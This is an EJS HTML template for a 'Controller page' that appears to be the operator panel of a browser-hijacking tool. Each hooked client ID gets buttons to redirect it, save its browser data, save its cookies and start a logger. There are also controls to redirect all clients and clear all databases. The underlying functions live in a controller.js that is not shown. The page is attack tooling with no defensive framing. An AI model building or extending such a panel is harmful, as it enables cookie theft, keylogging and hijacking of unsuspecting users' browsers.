<!DOCTYPE html>
<html lang="en">

<head>
  <% include ../partials/head %>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="static/js/controller.js"></script>
</head>

<body class="container">

  <main>
    <div class="jumbotron">
      <h1>Controller page</h1>
    </div>
    <button class="btn" type="button" onclick="clearDBS();">Clear all DBS</button><br/><hr/>
    <input id="redirectText" type="text" value="http://www.google.com" />
    <button type="button" onclick="redirectAll();">Redirect All</button>

    <ul>
      <% ids.forEach(function(id) { %>
        <li><%= id %> <button type="button" onclick="redirect('<%= id %>')">Redirect</button> 
          <button type="button" onclick="getBrowserData('<%= id %>')">Save data</button> 
          <button type="button" onclick="getCookies('<%= id %>')">Save cookies</button>
          <button type="button" onclick="startLogging('<%= id %>')">Start logger</button> </li>
      <% }); %>
    </ul>

  </main>

  <footer>
    <% include ../partials/footer %>
  </footer>

</body>

</html>